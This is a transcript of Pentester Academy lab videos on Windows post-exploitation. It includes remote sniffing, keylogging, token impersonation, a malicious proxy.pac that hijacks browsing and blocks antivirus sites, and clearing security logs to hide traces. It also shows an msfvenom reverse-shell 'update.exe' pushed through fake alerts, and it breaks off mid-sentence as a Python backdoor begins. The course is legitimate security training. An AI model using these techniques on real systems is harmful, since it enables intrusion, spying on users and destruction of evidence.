Welcome to the Network Pen Testing course at Pentester Academy. Now in this video, we will look at network monitoring on the remote machine we've just compromised as a post-exploitation phase. So to begin with, let's jump onto our machine. Now, we basically currently our system on the remote Windows 7 machine using the UAC bypass exploit which we spoke about in a previous video. The base exploit to gain entry was the bad blue one, again discussed early on in this series. So in case you have any confusions, please refer to past videos. So you can do the ipconfig command, and as we've seen before, this gives you the list of interfaces. For multi-homed hosts, this can become very interesting. Now, apart from this, one needs to use the route command to inspect how routing has been set up between the interfaces and to see if anything interesting is available. Now you have the netstat command available as well, and this gives you a ton of output. The ones which are interesting really is all the service ports which are bound and the programs which may be running on those ports. So this can come in handy to go ahead and figure out if any interesting services like MySQL Server, and depending on how you broke in, whether there's an FTP server, a TFTP server, and all of that could be easily found. At times, it's also possible to find other connected clients and get other IP addresses which could be interesting on the given network. Now, apart from this netstat, you could of course always go ahead and get a shell and use the regular netstat as well. And of course, with this netstat, you have other filtering capabilities which may be interesting to you. Now, apart from this, as you can imagine, it could be very interesting to monitor the remote network and to basically see if there is any interesting traffic going and coming by. Now, especially plain text protocols like HTTP, FTP, TFTP, and all of that could be good candidate cases for monitoring and finding interesting data on the remote network. Now, this is where we enter the realm of remote sniffing. To go ahead and use the sniffer module, just basically type in use sniffer, and it says sniffer extension loaded successfully, question mark, and at the bottom you have all the sniffer commands. Now, in order to look at the list of interfaces, we do a sniffer underscore interfaces and we get a list of interfaces. Now, it is important to note that the one we would be interested in is where usable is set to true. So let's go ahead and start sniffing. Now we can do this using sniffer underscore start. So here are our interfaces. Interface number 2 is the one which looks interesting to us. So sniffer underscore start. And this requires the interface ID. So we basically will say sniffer underscore start, interface ID is 2, packet buffer, let's say 5000. Now the BPF filter or the Berkeley packet filter only works for POSIX Meterpreter, right? So we won't give that simply because it's not going to work on Windows. Started sniffing. Now while this is running, you can collect the statistics by using sniffer underscore stats. and even this would expect the interface ID, as one could be running multiple sniffer interfaces, or rather multiple sniffing sessions on different interfaces. So if you notice, we've only found 2 packets. Let's go ahead and make this a little bit more interesting. Ping the remote machine. So there could be a firewall which ensures that responses are not received. Notice now we see more packets. Alternately, from the Windows machine, we can go ahead and ping our backtrack instance. There we go. Okay, so now we seem to have around 39 packets. Now here is what we can do. In order to dump these into a PCAP file locally on the attacker's machine, we're going to use sniffer_dump. Again, we give the interface ID and a local PCAP file name. Let's call it remote.pcap. It's written. Now we can go ahead and stop sniffer. And let's open this file up with Wireshark. Now, depending on how busy the remote network is and how interesting the host is, you might find really interesting and important things or even nothing, right? So a lot of this is trial and error, because one cannot really gauge how the remote network is architected and whether if you're on an interesting machine or not. So as you can see, we have some ARP traffic in here, and here are our ICMP ping requests which were sent from the backtrack machine to the Windows VM. Looks like the Windows VM may have ICMP responses blocked. And after that, once we go ahead and do the reverse, which is using the Windows machine to ping basically the backtrack machine, we see both the requests and the replies which are being generated. Right? Now, this is a very simple illustration. One can only imagine the info which we can get if the victim on the remote system is using HTTP or any of these other plain text protocols which can be easily monitored. Now, if you're interested, have a look at the web app pen testing challenges in which we looked at how to go ahead and collect all of this traffic using Wireshark and then try and reassemble different files and all of that from the raw traffic. That would be a very interesting exercise. Now at this point, however, you could do other things as well. You could even try and install your own sniffer programs on the remote machine, which can always keep running, so that as soon as it finds anything interesting, it can send it back to you. Now, all of this may require a little bit of custom scripting or tweaking of such existing tools available. Having said that, I cannot, emphasize more on how interesting remote monitoring and sniffing is to post-exploitation. So hopefully you've enjoyed this video, and if you're enjoying your time at Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. All, welcome to the Network Pen Testing course at Pentester Academy. Now in this video, we will continue with pen testing Windows endpoints and understand the interesting concept of Windows sessions, stations, and desktops. So really, what are these three new terms? Now a session basically signifies a single user's logon session. Stations are nothing but security boundaries to contain desktops and processes for that single logged on user. And finally, desktops, as one can imagine, is where all the GUI objects are allocated. Now, this is a very simplistic representation, and if you're interested in going through more details, I would highly recommend going to these through blog posts. I think both of these posts are in sufficient detail and talk about session stations and desktops in case you're interested to know more. Now, from our perspective, if you wanted to visualize, then really, let's say you have a session 0. Under that, one can have both interactive and non-interactive Windows stations. Now there is only one interactive Windows station allowed for a session, and that is named WinSTA0. Now under this interactive Windows station, you can have the default desktop, disconnect, and WinLogon. Now default is really the user's desktop. WinLogon is pretty much when you're logging on to your session. After that, you have service desktops as well, all of which are non-interactive in nature. Right? Now, if you wanted to look at WinSTA0 and understand all the different objects and role play, you can go ahead and download WinOBG, which is part of sysinternals by Mark Russinovich. And once you go ahead, download and install it, you can run it as administrator. And once you run it, you should be able to locate sessions, and there could be multiple sessions depending on what is happening on the machine. And if you notice, session 1, basically under Windows Station, you will find WinSTA0, which is really the interactive Windows Station which we spoke about, right? And of course, you can play with WinOBG more to look at other interesting things as well. Now, why is this important? Well, this is important because if you want to go ahead and control anything on the user's active desktop, you need to be on the interactive Windows Station or WinSTA0. Without this, it would not work. So let me give you a very simple example. I'm going to go back to my Meterpreter sessions. Now I have two Meterpreter sessions, and this is based on the UAC bypass exploit. The first one is basically user mode, where I'm still the user, while the second one is basically after privilege escalation, where I am system. Now let's continue on the system prompt, and please refer to previous videos in case you're confused about how to get both of these Meterpreter sessions to run concurrently. Now the very first thing is to do a get desktop, and if you notice, at this point we have session 1 WinSTA0 default. Now only if you are on the interactive desktop, which is basically WinSTA0, would you be able to go ahead and monitor what the user is doing. So similarly, always ensure that you are on the interactive desktops, right? WinSTA0 default. Now let's go ahead and load up SPIA, quick question mark, and this has screen grab and a bunch of other interesting things. Come to that in just a bit. Now STD API has a bunch of interesting commands with which you can go ahead and interact with the user, get his keystrokes, get screenshots and whatnot, right? So enum desktops really gives you the list of all desktops available. So in this case, it's WinSTA0. And if we kind of go back, right? In this case, because we are system, we have access to many more interesting things. So you have WinSTA0, default, disconnect, and log on, all three, right? Now, if let's say you wanted to start a key logging session, then we would use keyscan_start. Now if we go back to the Windows desktop, open up, let's say, Notepad. Type in something. This is a secret. Go back here to our Metasploit machine and do a keyscan dump. You would find that we basically find our keystrokes in here, right? So we can stop the sniffer by doing a keyscan stop. Now, so this is an example in which we are able to monitor keystrokes and everything by ensuring that we are in the interactive desktop. Now, on the Metasploit series, the older videos, I've shown you what happens when you're not on the interactive desktop, right? In that case, you would not be able to sniff the keystrokes and all of that. Now, there could be other interesting things you can do as well. So let's say you've just broken into a machine, and at that point you do not want the user to be able to, let's say, shut down the machine or something by maybe moving his mouse. So this is where UI control comes in handy. You could briefly go ahead and disable the keyboard or mouse. So let's say UI control, disable keyboard. If I go back in here, try to type things, pretty much nothing would work. And one could also go ahead and disable the mouse. Of course, a user may think his whole system is hung and he may try to reboot the system. If you notice, I'm not able to get a mouse pointer inside. And he may just do a cold restart by just pressing on the restart button. So that's a possibility. But this just buys you a little bit of time in case you're doing something where you do not want the user to disturb you, or rather to stop what you're doing. Go back in here. Now everything works perfectly, right? Fantastic. Now, apart from this, you also have this regular screen capture, which you can actually do using screenshot or the screen grab, which I showed below. So you can type in screenshot. This takes a screenshot, stores the screenshot in here, and you can go down there and open it up. So here is the image. It's opening up it a bit slowly, but there you go. You can see that this is a secret kind of truncated in here. Right? So this is how one can go ahead and interact with the user, enable, disable controls and all of that But I think the key concept here is to understand that you need to be in the interactive Windows station, and after that you can select an appropriate desktop based on what keystrokes or what you want to really capture, right? Which could be the user's current desktop or the logon desktop, where let's say you want to catch the logon credentials. And always ensure that you do a get desktop before running any of these UI control based programs or meterpreter commands, or else you may find that things might not work and you might get confused as to why it isn't working. So please look at the links, download WinOBG, and hopefully you had fun in this video. If you're enjoying your time here at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Network Pentesting course at Pentester Academy. Now we will continue with pentesting Windows endpoints and look at a very important strategy called impersonation. So typically when you've compromised a Windows-based machine, there could be multiple accounts on that machine, and at any given instance there could even be other logged in users. Now really what impersonation allows us to do is, based on which tokens are available on the system, it allows us to impersonate other users and accounts. Now in this video I'm using our familiar session. Meterpreter 9 is really creating the whole bad blue exploit, which we've discussed in previous videos, and Meterpreter session 10 is after bypassing UAC and getting system on the machine. So let me first go on to Meterpreter session 9, do a quick get UID, and I'm basically security tube-pc/security tube, right? Now to get a list of all tokens available for impersonation, we are going to use the list tokens command. Now by default this is not loaded, so we're going to call load incognito, which is really the extension which can help us with impersonation. So after that I'm going to do a quick list tokens. Two possibilities. Let's do it by username. And if you notice, right now we pretty much get nothing. It's simply because list tokens works best typically when you're only running as system. So let's background this session and connect to session 10, where we are already system after UAC bypass and running get system. Now here, once we load incognito and we do a list tokens, you'd basically see we have delegation and impersonation tokens. Now, why would you want to impersonate? So let's say on a specific system, you would want to access resources, or you would want to create files, directories, or do some action as a particular user. This is where impersonation comes in handy. So to give you an example, now to impersonate, we are basically going to use impersonate underscore token. And this basically has to be run as impersonate underscore token followed by the actual token. Remember, you need to go ahead and use double backslash for domains. So let's just list our tokens again by username. And let's say, given that we are system, let's say we want to impersonate security tube. paste this. And there you go, right? Now we are the user security tube. Now the best part really is that you could now execute commands on the remote system by impersonating this user. So as a simple example, let's say we execute a command prompt. And if we do an IP config, if we do a who am I, you would actually find that we are security tube. Fantastic, right? So now anything we do on the system will be with this user's privilege. So this is really how impersonation works. There is also delegation, which has other interesting twists to it. When we look at the whole Windows domain as an environment and look at different pen testing techniques around it, at that point we will look at delegation and all of that in more detail, and how network-wide attacks can be done using this technique. Apart from the commands in incognito, by the way, there are some available under SGD API as well. For example, steal token, rev to self is revert to self, all of that. And then you have drop token in here, which is also something worth looking as alternate ways to get things done. So keep in mind, I think the key takeaway is with tokens you can impersonate different users and accounts on the system. To get an exhaustive list of tokens, it is best to run as system and then to use incognito to go ahead and create things, impersonate users and accounts and do actions. So that's all we have in this video. If you're enjoying your time here at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Network Pentesting course on Pentester Academy. Now in this video, we will continue with pentesting Windows endpoints and look at how in the post-exploitation phase, a hacker can tamper the PAC. Now, if you've never heard of the PAC before, it stands for Proxy Auto Config and is a very common way in enterprises to assign proxies based on various policies. So as an example, for internal hosts, there could be no proxy, while for external ones, there could be specific proxies. And we'll look at some of the interesting possibilities in this video. Now, the interesting part is the proxy autoconfig is actually written in JavaScript, and of course only a certain number of functions are allowed, and it runs within a sandbox. Now, if you're still clueless what all of this means, let's go to a Windows box, and if you look at Internet Explorer, go to Internet Options, Connections, click on LAN Settings, and this part in here, right, is where you put in the auto configuration script. Now this address can be local, which points to somewhere on the file system, or can be remote, something served over HTTP. Right now there are no proxy settings. Now on Internet Explorer we've seen it. In the case of Firefox and other browsers, most of the time they are configured to use system proxy settings by default, which means they automatically use the same PAC configured on IE. Fantastic. So now let's actually move on. Now, as I mentioned, the PAC is written in JavaScript, but however, we have very limited functions which we can use, of course, apart from regular JavaScript where we can add, subtract, try, searching patterns and all of that stuff, right? So I've given you the link, right? We can do interesting things like DNS domain is. Now this allows us, let's say, to check for all domains such as google.com, maps.google, www.google.com, etc., and then decide what we would want to do. I'll show you how to write a PAC in just a bit. There are other functions here as well which one could use. Now let's actually write a sample PAC. I'm on my Kali machine. Let's go into the var www folder. Let me actually start Apache. And let me create a new directory called PAC demo. Change into that directory. Open up my favorite editor and let's call this proxy.pac, right? There is no hard and fast rule about the file name, but typically most people, as per convention, end up calling it proxy.pac. Now, this can have a couple of things. The most important is actually to have a JavaScript function with the name find proxy for URL. And this actually takes in two inputs, the URL and the host. Now keep in mind that the host and the URL is actually passed by the browser to this function based on what the user has just typed in. And this function is responsible for sending back the proxy settings. So let me give you an example. Let's say we define an attacker based proxy where attacker proxy, and let's give it the IP address. First we use the keyword proxy and then the IP address 192.168.1.10, the port number, let's say 80, right? If you do not know JavaScript, I think most of this is easy to follow. We aren't getting into too many language details here, but if you're interested, on Pentester Academy, we have a course called JavaScript for Pentesters, which you can have a look at. And let's say we define another variable and say basically no proxy. And there is a little keyword with which we can tell the browser that go ahead, fetch it directly, and that is actually direct. Okay, so if we return direct, then the browser will go ahead and try to fetch the URL directly, and if instead we return any other proxy setting, the browser now tries to contact this proxy to get the URL. Now this is really where we can go ahead and now play a lot of interesting things. So let's say in the beginning we pretty much almost always return attacker underscore proxy, right? This is what we are going to return always. So let's keep this as the file. Hopefully there are no typos in here. Now we need to go ahead and set up the proxy here. From our perspective, the best way to really do this is using Metasploit after we've broken into the machine, right? So here is what we are going to do. Let's just go ahead to our Kali machine. Now I've already exploited the remote Windows 7 machine, right? Just so that we don't waste time in the actual exploitation aspects of it here. And I want to use an interesting little post module. So let me go ahead, background the current session and use post Windows manage, and the name of the module is IE underscore proxy pack. Let's look at the different options we have, right? Now in our case, we want to use a remote PAC. So we're going to set remote PAC, point it to our IP address 1.10, and if you recall, we have put the PAC file in var www, which means under PAC demo, and the name of the file is proxy.pac. Right now, when we also need to set the session on which the post exploitation would run. So session is 1. You can verify your session number, and then let's hit exploit. I hope my Meterpreter session isn't stale. Let me just check that real quick. Okay, seem to be okay. Exploit again, and there you go. The exploit script succeeded. And just to verify, let's actually go back to the Windows machine and open up IE. Let's go to Tools, Internet Options, Connections, LAN Settings, and there you go. It's automatically been set to 1.10 PAC demo, proxy.pac. Fantastic. Right now, if we actually go back to our attacker machine and do a tail on the logs for Apache, the access logs, our Windows machine is an IP address 1.30. We can go in and put in any site, let's say dimdim.com. Right, and if you notice, it basically has returned the attacker's proxy settings, and we have ended up serving basically our index.html, which in this case, as no index.html was existing, we ended up getting a directly listing. Right now, let's say we set up an index.html. Just going to go ahead and move index2.html back to index.html, and I can go back in here to keep watching our little logs. And similarly, if I use Internet Explorer, if I use Firefox, it pretty much ends up inheriting the same setting. So let's say if I put in securitystube.net, if you notice, we end up serving the Apache's default index.html, which is the it works stuff, right? So this is how powerful the proxy.pac file really is. Now, the best part of being able to overwrite this and at the very same time point it to something on the network is that one could go ahead and change this dynamically on the attacker's machine, right? So PAC demo, right? Now you can even ensure that all of this happens only for specific domains, right? So if I go back in here, there are a bunch of options, sh exp match, which ends up trying to match a specific expression which you put in, or let's say DNS domain is. So as an example, let me use DNS domain is. I'll go back in here. I'm going to say if, right, DNS domain is, let's say, gmail.com. I'll just verify if I have the right capitalization. Very, very important. Then return attacker proxy, right? And for everything else, we basically end up returning the no proxy, which actually says that go and fetch it directly, right? Now keep in mind that browsers do cache the proxy.pac file, right? You can try and check whether it is consistent across browsers, that is the caching time, or if it isn't. We may have to go ahead and restart the browser just to kind of ensure it tries to hopefully fetch it again. And we'll know in just a bit. So let's say I put in securitytube.net, right? It's unable to fetch it. Put in gmail.com. There you go. Now it selectively hits our attacker server for gmail.com. Now the reason it wasn't able to fetch securitytube.net is this Windows 7 instance is really not connected to the internet, right? I just have one interface which is connected to my Kali machine using a host-only adapter inside my VMs, right? That's the reason why we could not fetch gmail.com. Anyway, so you get the point. Using these functions, now you can create a decently complicated proxy.pac file, using which now an attacker can selectively go ahead and use his own proxies for certain hosts or even certain URLs. Now, if you think about it, find proxy for URL allows you even to fine tune this for specific URLs, right? Where you would actually end up using the URL in these tests to decide what to serve back as the proxy. Now, keep in mind there is a lot of fault tolerance and all of that built in as well. So let's say you could put in a colon direct in here. Now what this does is the browser will first try out this proxy. If it is unable to connect, or there are errors, then it would move on to the next thing in the chain. You could even chain a list of proxies this way to basically ensure that when your proxy isn't around, then the browser can pretty much go ahead and fetch it either directly or through some other proxy which you set up. Fantastic. So as one can see in a post-exploitation phase, this can pretty much allow you to hijack the entire browser behavior, and by setting up in between hosts, you can do stuff like complicated MITM attacks. Right? So I've already shown you the Metasploit post module. Have a look, try it out. And as one can clearly imagine, the security concerns are that this single file, once configured, can control where your browser goes to fetch URLs. Now keep in mind that in a post-exploitation phase, one could overwrite this specific configuration value and point it to a local file, right, or to a remote file. Or at the very same time, let's say that you aren't able to exploit the machine, but maybe there is a proxy.pac already configured which points to some IP on the network. Then an attacker could try to break into that machine and change the proxy.pac for all the browsers in the network. or even try interesting MITM attacks with which he can probably send back a fake proxy.pac whenever the browser tries to request for the legitimate one, and in turn control again where the browser goes. Of course, one could use browser autopawn and all of that as well to actually serve browser-based exploits on the attacker's site. Now, this trick is very popular with malware authors. I leave you with a post from securelist.com where they've taken up different malwares and different techniques, including even obfuscating the proxy.pac file. It's a great read and I highly recommend it. So hopefully you guys have had fun in this video, and if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Network Pentesting course on Pentester Academy. Now in this video, we will continue with pentesting Windows endpoints and looking at how it is possible to block websites using a malicious PAC. Now, why would you want to block certain websites? Well, think about it. AV sites and a couple of others could end up interfering with probably you wanting the machine to remain unpatched. This is typically true for malware, which probably don't want the user to download AVs, patches and other things, right? So the common practice they actually use is actually to black hole certain websites by pointing the browser to the proxy IP 127.0.0.1 followed by a port which is pretty much most of the time assumed to be closed, like let's say 65,000, right? Now, of course, there are legitimate uses of such black holing as well, which includes blocking ad networks. So let's jump right in. Now, I'm building up on the last video demo. So if you haven't seen the last video, please go back and have a look at it. I'm going to open the proxy.pac which I used in the last video. And as an example, one could go in here and put in avg.com, and then I can again do an OR. DNS domain is, let's say, avast.com, right? And so on and so forth. Now let's define a black hole as well. And this would actually be 127.0.0.1, let's say a port number of 65,000. And in these cases, we would end up returning the black hole. And for all other cases, for the time being, let's actually return the attacker proxy. Right? Hopefully there are no typos in here. Now, let's restart the browser. And if we go to, let's say, google.com, right, this should point to the attacker's web server, which is fine, which is exactly what it was configured with. And if we go to, let's say, www.avg.com, this eventually should go to the black hole which we had envisioned, right? Fantastic. Now, this is how it is possible for an attacker to go ahead and permanently block certain websites by using a malicious PAC. Now this is something you can try out. Keep in mind there are legitimate uses as well, such as blocking ad networks, etc. What I would highly recommend is that go back to the last video and look at many of these functions which are there and see how you can use them to be creative and innovative to write a PAC file which would suit your needs. That's all I had in mind for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. All, welcome to the Network Pen Testing course at Pentester Academy. Now in this video, we will continue with pen testing Windows endpoints and look at log management in the post-exploitation phase with Wevutil. Now, log management is something which is very, very important from a post-exploitation phase, as one can imagine. Right from security logs to application logs, as a pen tester, you might want to remove all the traces on the system once you've broken in. Now, this is where Wevutil is very, very important and is probably the Swiss Army knife. Now, according to TechNet, this is a command line utility which you can use to get metadata information about providers, events, and channels, and a ton of other things. So let's jump right in. Now, the setup which I have is exactly identical to the previous videos, and I've done a bypass UAC, and the meterpreter I have is after that. Now, if you're wondering what all this is, in case you missed previous videos, I'd highly recommend you go back and watch them to create an identical setup. Okay, so basically the Windows event utility is something which of course isn't part of meterpreter, and hence I would require a command prompt on the system. So let me create one, hidden from view, channelized, and let's interact with it. There we go. Now, Wevutil is really an ocean. There are tons of things which you can do, and pretty much all the logs on the system can be played around with this utility. So let's look at a couple of important examples. Now, if you'd like to list all the logs on the current system, it's basically EL. So here we go. Right, this is enum logs, list log names. And there's going to be a ton of output, as one can see. So these are all the logs which are available. Now, not all of them are important from a security perspective. So you need to use your judgment and knowledge in here about what is important to you. Now, for the purpose of this video, I am just going to focus on the security logs which are listed at the very bottom of the output. So let's move on. So I've enumerated all the logs in the system. Now let me go ahead and look at the statistics of the security log. Now this is achieved by using the GLI command. So you have till GLI and then you have security. Now this gives you some stats about the creation, last access, last write, the size of the file, the number of attributes, and the number of log records. In our case, which is 2778. Fantastic. So this, as an attacker or a pen tester, gives you an idea about the number of events which are registered in the security log at this point. Now, if you'd like to view the log entries, we basically use the QE command, and really I would highly recommend that you visit this link and look at the other documentation. Pretty much all of this is available on MSDN as well. So we're going to use QE security and then display the last 3 log entries in text. So we're going to do a Wevutil, and after that the command we are going to use is QE. We give the specific log name, which is security, and after that we basically have the switch /e3 rd true and f is text. Right, now this would display the last 3 entries. Right, depending on how good you are with logs, and if you have any experience viewing Windows logs, you would make sense out of this. So if you notice, the task is a special log on, blah blah blah, the security ID which was used, and depending on really what you're looking for, you could do very interesting things. Now Wevutil, you can even do queries on the log file, right? Basically that is something you can check out in the documentation, but in case you're curious about certain kinds of logs, that's something you can do in here as well. Now, one of the other interesting aspects of Wevutil is you can export events. So as an example, EPL is really exporting. So we could actually do a Wevutil, and basically we can do an EPL for export security log, and then finally you need to give the destination location of where you would like to export it. So C drive, let's say sec.evtx, and now if we basically go in here to the Windows machine, go to C drive, here is the sec logs which were exported. You can double click that so that you can have the native viewer show it to you in an easy to understand format. Right, 2778 if you remember. Takes a bit to open. It's opening up. There you go, right? So you have all the logs and everything which you exported. Now this could be very interesting at times to look at, what kind of traces you might be leaving behind on the system based on the activities which you're doing. So this is a very, very important phase in my opinion, and ensure that you understand the kind of logs you would really fear from a discovery perspective, right? Finally, I think pretty much you can clear the logs as well using CL as the command, and if you'd like, you can back up the existing logs before clearing them using the BU switch followed by the path of the backup if you'd like to. In this case, I'm just going to go ahead and clear them. Right, and kind of go back in here and use GLI. Actually notice that all those records were deleted and number of log records is just 1 right now, which could be events based on what we've done at this point. So this is really how you can use Wevutil and do a ton of fantastic things. I mean, I know Meterpreter has the clear logs and all of that, but I'd highly recommend only using Wevutil for most of the stuff, simply because it gives you very granular control and power over exactly what is happening from a logging perspective. And this is a very, very useful and important utility. So keep that in mind. So hopefully you've enjoyed this video, and if you like your time here at Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead. Welcome to the Network Pentesting course at Pentester Academy. Now in this video, we will continue with pentesting Windows endpoints and look at how WMIC can be used in the post-exploitation phase. So Windows management and instrumentation is really a Swiss Army knife for pen testers. Apart from automating both local and remote administrative tasks, we can go ahead and actually find a fantastic amount of information about the system using WMI. Now the command line utility which we will use to access all of this is WMIC. So let me jump right in. Now I have a meterpreter session after bypassing UAC on the Windows 7 box, and this is just continuing with what we had in previous videos. So let me go ahead and execute command shell so that we can work with it. Now WMIC, if you look at all the options available, it is just mind-boggling. So you have from BIOS to boot config to disk quota to disk drive, a ton of stuff. Not all of them important or interesting from a security perspective, but purely from a post-exploitation phase, pretty much you can find all the details to a very granular level about the victim computer you've just compromised. Now there are a ton of things in there, and I probably will go ahead and allow you to play with it later. Let me touch upon a couple of interesting examples. So to look at the list of user accounts, you can type in WMIC user account list, and this would go ahead and dump the different accounts which are there, the account names. For example, here is security tube, the SID, and a couple of other parameters. Now unfortunately, due to the limited amount of screen real estate which I have, there's a lot of wraparound happening. I think on a much better resolution, you would go ahead and see all of this listed beautifully under the same column rather than the wraparound happening. Now, apart from the account details, you can get the list of all processes. So you could do a WMIC process, tons of option in there. So WMIC process list would pretty much dump a ton of information about all the processes. Now, of course, you might not be interested in every tiny detail, and this is where customization of the columns is possible. So as an example, if we just want the name and the PID, we could do a WMIC process get name and then process ID. And this would dump the list of all process names and their respective process IDs. Fantastic. Now, apart from this, there's also other ways to list the processes. So you can do a WMIC process list, and there are tons of ways possible. So you have brief, full, and whatnot. So if you do a WMIC process list brief, then this would list most of the important things which you would be interested in. So name, handle count, the priority, the process ID, the thread count, and some other interesting statistics. Of course, it is possible to customize and get specific columns depending on your own requirements. Now, one of the other interesting things from a pen testing perspective is to look at the list of all programs which would run at startup. So WMIC allows you to do a WMIC startup list brief. So we have WMIC startup list brief, and this would tell us about some of the programs which will begin at startup. As you can clearly see, AV GUI is probably AVG UI rather, and you have the Java updation put in there. You have VirtualBox, VBox tray in there, and a couple of other things. A lot of time as an attacker, if you manage to upload a backdoor binary onto the system, you might want to go ahead and add your program as part of the startup list. Now, another interesting aspect is to figure out the list of products installed on the system. Now, multiple ways to do it where you can have a ton of information being delivered to you. One possibility is WMIC product get name comma vendor. So you have WMIC product, then get, and then the columns we are interested in is name and vendor. Now this does take a little bit amount of time, and if you remember, this is similar to when you actually click and want to look at the list of all softwares installed on the system, right? It does take a little bit time. Now WMIC, guys, is really an ocean, and I would highly recommend that you look at as many of these kind of sub commands as possible and see which ones are relevant to you. Okay, it's taking longer than I'm expected it to. Let's give it a minute. At the very least, I can still see the cursor flickering. So hopefully we should see an output shortly. Hopefully the demo gods aren't too angry with me today. And we would eventually see the list of products installed by name and vendor. There you go. So you have Microsoft Visual C++, you have Java, you have Python, you have AVG, Java Updater, blah, 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 right? So these are some of the list of third-party products which have been installed. Now, apart from this, you can even look at the list of shares, which is very, very interesting, just to see what is shared with the other users. And depending on what's inside, you could even use that as a starting point to begin infecting other users on the network. So we can go in and say WMIC share list. And if you notice, here is the name of the shares. You have admin $, C $, IPC $. Aha. So you have office-confidential and then the users directory. Now this looks exceedingly interesting. And as a pen tester, you may probably want to connect to this share, see if you can look at the contents and all of that. And maybe you may find something interesting. Now, if you want to look at the list of all the groups available, so you can do a WMIC group list brief, and this would give you all the groups available, their SIDs and all of that, which can come in very handy, especially if you've broken into a computer which is part of a larger domain. Now, there are tons of things you can do in post-exploitation. I would highly recommend that you go ahead and look at the documents which are actually made available by Mubix from the Metasploit team. So here is a link to the doc for Windows post-exploitation, which I highly recommend that you have a look at. So that's all for this video. If you're enjoying your time here at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Network Pentesting course at Pentester Academy. Now in this video, we'll try to see how we could conduct a social engineering based attack using a malicious PAC file. Now consider this specific scenario that on the machine or on the victim machine, a network based PAC is configured, and what I mean by that is the PAC script is available on a specific IP address in the network, right? Now the first step to conducting this social engineering attack is to hijack layer 2. Now, one of the cases I can give you is, imagine the attacker has created a fake access point at a hotspot location like a coffee shop or airport, and a victim's laptop connects to it, right? We are already aware of tools like Metasploit, which can be used to create these fake APs and launch browser-based attacks. But the fact of the matter is, once you hijack layer 2 using one of these techniques, it is very, very easy for the attacker to redirect all requests to the attacker's machine and service them. Now, once a machine goes ahead and connects to the attacker's fake AP and he hijacks layer 2, then your browser will try and make a request to fetch the proxy.pac file just to check if something has changed. The attacker will then respond to that request and inject a malicious PAC file, right? This PAC file could do a lot of interesting things. Now, one of the things which I found was that alert in JavaScript is an allowed function in a PAC file. So imagine you inject the malicious PAC, and here is one example in which when the victim tries to go ahead and view mybanksite.com, which could be any banking site or any important site which requires credentials, then we actually send him an alert first saying to update his software before he can connect, right? Fantastic. So let me give you an example. So here is my victim machine, here is the attacker machine, and let me open up the proxy.pac file. Now what we'll actually do is, in this specific case, just as a variation of what I showed you on the slides, right, for every single request we would ideally go ahead and want to force the user into downloading and upgrading his browser, right? And this is where now, I'm not even checking which site he's really trying to go to. I'm going to alert, please update your browser, urgent security issue, and return the attacker proxy IP addresses. And in the index.html file, I go ahead and redirect to update.exe stored on the attacker's server, and this could mention any message which says please install update to access your banking site or to access the internet, right? Remember to turn on Apache after this. Now let's also generate update.exe, which is very simply going to be a reverse TCP meterpreter. So I can use msf venom -p Windows meterpreter reverse TCP L host equals the attacker IP 192.168.1.10. Output format is exe, and then we can pipe this to update.exe. So let's redirect this output and create update.exe. Let's verify update.exe. Okay, fantastic. Now let's also set up Metasploit. So what we'll do is that no matter what URL the user types in, the malicious PAC will keep sending him alert messages, right? And eventually update.exe would be pushed out to him, and hopefully a gullible user would end up running update.exe. Let me pause while Metasploit is loading. Let's set up the exploit handler, exploit multi-handler, set payload, Windows meterpreter, reverse TCP, set lhost 192.168.1.10, which is the attacker machine, hit an exploit, and now we are waiting for the inbound connection. Now on the attacker machine, on the victim machine, let's open up the browser, and if you notice, it immediately gives you an alert which says please update your browser urgent issue, again and again and again, right? So pretty much no matter what you try to access, this is exactly what you end up getting. So let's type in a URL now. Let's say we get the alert, right? And it says please install update to access the internet, again an alert, and if you notice, IE tells you that there is a file available for download, and there you go, update.exe pops up. You hit a run because at this point you aren't able to access the internet, and if you notice, by default AVG would end up detecting this as a virus, or rather any antivirus. Now I've talked about AV evasion in previous videos, so in this case we aren't going to talk about AV evasion, but refer to some of the previous videos which I have created, especially the one in which I use the Python based procedure to go ahead and create a payload which is not vulnerable to detection. So I'm just going to run that one just to make you keep in mind that this is really what you may end up seeing. So we'll go to that binary, and let's say this was the binary which we were serving, then we would get a meterpreter prompt, right? Alternately, one could disable the AV for just a bit. So I have disabled the AV in this case just so that our base payload can work. And once again, if you had visited any site, you would again continue to get these little alerts, right? Request for a file download, and when you run update.exe, right, you'd actually end up getting your meterpreter. Now keep in mind, of course, AV evasion is something you would have to do in most of these cases, and that's the reason why I showed you specifically that the base payload will be detected, and you should use one of the AV detection techniques we have discussed in this course. If you scroll up, you should find a couple of those videos, and you should try and use them. Right? Fantastic. So hopefully this social engineering attack was interesting and clear to you. Of course, the alerts can also be served by injecting into HTML or by sending out malicious HTML. The interesting part here, of course, is we did everything using just the PAC file. So hope you guys have enjoyed this video, and if you're having fun here at Pen Tester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Network Pen Testing course on Pen Tester Academy. Now in this video, we will look at creating custom Connect shell based backdoors. Now why do we even require this? Now as you've probably noticed, using Metasploit based payloads ends up giving you a very high detection rate by AVs. Now even if new encoders or new payloads or techniques are added by the Metasploit guys, I think it would be quite commonsensical to assume that AV vendors are monitoring the Metasploit project very closely. So how do we combat this? Well, the answer is easier than you think if you know a little bit of scripting, which is writing your own custom code. Now, if this has already startled you, I would recommend that you at least watch this video and see how easy it actually is, even if you know just one scripting language like Python. And on Pen Tester Academy, we already have the Security Tube Python scripting expert videos available. The reference I'd like to use is David Kennedy, who's the author basically of the Social Engineering Toolkit and the CEO of Trusted Sec. He has put up a couple of examples of this on his website, which I would recommend you download and try. For this video, I'll basically write something on the same lines, but something which probably will be much more easier to understand. So here is what I want to do. I want to create a simple script in Python which will connect back to the attacker's machine and accept commands from the attacker, which it will run locally on the victim and send back the responses of those commands back to the attacker, right? Really a reverse connect shell. So let's go ahead and do this. Now I'm going to be writing this in Python. And if you notice, I'm already on a 